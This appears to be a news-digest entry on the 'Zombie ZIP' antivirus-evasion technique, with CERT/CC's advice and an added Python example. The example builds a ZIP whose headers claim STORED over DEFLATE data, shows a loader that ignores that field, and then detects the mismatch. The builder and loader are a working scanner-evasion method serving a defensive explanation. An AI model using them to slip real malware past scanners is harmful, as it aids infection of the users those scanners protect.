
Zombie ZIP Technique Bypasses Security Tools

1 unique source, 1 article

Summary


A technique dubbed 'Zombie ZIP' lets malware evade archive-aware security tools by lying in the ZIP headers. The entry's compression method field (present in both the local file header and the central directory) is set to STORED (Method=0), so a scanner that trusts the header reads the entry as raw, uncompressed bytes. The bytes are in fact a DEFLATE stream, so the scanner sees only compressed noise and no signature matches. A custom loader that ignores the method field and inflates the data anyway recovers the payload intact. The technique reportedly defeats 50 of 51 antivirus engines on VirusTotal. A proof-of-concept (PoC) has been published, and CERT/CC has issued a bulletin warning about the risks; the issue is similar to a vulnerability disclosed in 2004. CERT/CC recommends that security tool vendors validate the compression method field, detect inconsistencies in archive structure (such as a STORED entry whose bytes parse as a complete DEFLATE stream), and offer more aggressive archive inspection modes. Users are advised to be cautious with archive files, especially from unknown sources.
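The following is an added example, not the published PoC and not code from CERT/CC or the original report. It builds a one-entry archive whose headers claim STORED while the data is raw DEFLATE, shows that a header-trusting reader (Python's zipfile) returns compressed noise that contains no signature, shows the attacker-side loader that ignores the method field, and then implements the kind of consistency check CERT/CC recommends: for every entry that claims STORED, try to raw-inflate the bytes and treat a clean, complete decode as a lie in the header. The entry name, the signature string and the payload are all constructed here for illustration.

```python
"""Added example: a 'Zombie ZIP' builder, the header-ignoring loader, and a
defender-side consistency check. Names and sample data are constructed."""
import io
import struct
import zipfile
import zlib

# Constructed stand-in for a malware signature; any byte string works.
SIGNATURE = b"<<CONSTRUCTED-MALICIOUS-MARKER>>"
PAYLOAD = b"benign-looking preamble " * 8 + SIGNATURE + b" trailing bytes " * 8
ENTRY_NAME = b"report.bin"  # hypothetical entry name


def build_zombie_zip(name: bytes, payload: bytes) -> bytes:
    """One-entry ZIP whose local header and central directory say STORED (method 0)
    while the entry data is a raw DEFLATE stream. CRC-32 and both size fields are
    computed over the *compressed* bytes, so a header-trusting reader sees a
    self-consistent stored entry and its CRC check passes."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15: raw DEFLATE, no zlib wrapper
    data = c.compress(payload) + c.flush()
    crc, size, method = zlib.crc32(data), len(data), 0  # method 0 == STORED (the lie)
    date = 0x21  # 1980-01-01 in DOS date format
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, 0, method, 0, date,
                        crc, size, size, len(name), 0) + name + data
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, 0, method, 0, date,
                          crc, size, size, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def header_trusting_scan(blob: bytes, signature: bytes) -> bool:
    """What a scanner that honours the method field does: zipfile hands back the
    entry as stored bytes, the CRC matches, and the signature is not found."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return any(signature in zf.read(info) for info in zf.infolist())


def zombie_loader(blob: bytes) -> bytes:
    """Attacker-side loader: parse only the first local file header, ignore the
    method field entirely, and raw-inflate the entry data regardless."""
    comp_size = struct.unpack_from("<I", blob, 18)[0]      # compressed size field
    name_len, extra_len = struct.unpack_from("<HH", blob, 26)
    start = 30 + name_len + extra_len                      # 30-byte fixed header
    return zlib.decompress(blob[start:start + comp_size], -15)


def find_zombie_entries(blob: bytes) -> list:
    """Defender-side check (the 'validate the method field' advice): for every
    entry that claims STORED, try to raw-inflate its bytes. Genuinely stored data
    almost never parses as a complete DEFLATE stream ending exactly at the entry's
    end; if it does, report the entry with its inflated content for scanning."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.compress_type != zipfile.ZIP_STORED:
                continue
            raw = zf.read(info)
            d = zlib.decompressobj(-15)
            try:
                inflated = d.decompress(raw) + d.flush()
            except zlib.error:
                continue  # not DEFLATE at all: consistent with STORED
            if d.eof and inflated and not d.unused_data:
                hits.append((info.filename, inflated))
    return hits


def hardened_scan(blob: bytes, signature: bytes) -> bool:
    """Scan the bytes as declared and, for inconsistent entries, the inflated view."""
    if header_trusting_scan(blob, signature):
        return True
    return any(signature in content for _, content in find_zombie_entries(blob))


def build_legit_stored_zip(name: bytes, payload: bytes) -> bytes:
    """Control case: an honestly stored entry written by the standard library,
    used to show the check does not flag ordinary uncompressed data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name.decode(), payload)
    return buf.getvalue()


if __name__ == "__main__":
    z = build_zombie_zip(ENTRY_NAME, PAYLOAD)
    print("header-trusting scan finds signature:", header_trusting_scan(z, SIGNATURE))
    print("loader recovers payload:", zombie_loader(z) == PAYLOAD)
    print("hardened scan finds signature:", hardened_scan(z, SIGNATURE))
    print("legit stored zip flagged:", find_zombie_entries(build_legit_stored_zip(ENTRY_NAME, PAYLOAD)))
```

The check in find_zombie_entries deliberately requires a complete stream (d.eof set, nothing left over) rather than merely a decode that does not raise: ordinary text or binary data read as raw DEFLATE usually fails with a zlib error within a few bytes, and the rare partial decode stops short of end-of-stream, so neither is reported. A production scanner would apply the same test to every entry, not only the first, and cap the inflated size to avoid turning the check into a decompression-bomb vector.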

Timeline

  1. 10.03.2026 22:05 · 1 article

    Zombie ZIP Technique Bypasses Security Tools
